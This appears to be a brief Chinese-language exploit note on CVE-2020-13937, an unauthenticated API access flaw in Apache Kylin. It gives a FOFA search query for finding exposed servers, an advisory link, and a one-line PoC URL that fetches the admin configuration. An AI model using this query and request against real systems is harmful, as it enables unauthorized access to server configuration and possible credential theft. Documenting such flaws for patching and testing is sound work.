# Apache Kylin API未授权访问漏洞(CVE-2020-13937) fofa:title="Kylin" 预警通告:https://help.aliyun.com/noticelist/articleid/1060733129.html PoC: ``` http://xx.com/kylin/api/admin/config ``` ![](media/16097311107960/16097311518750.jpg)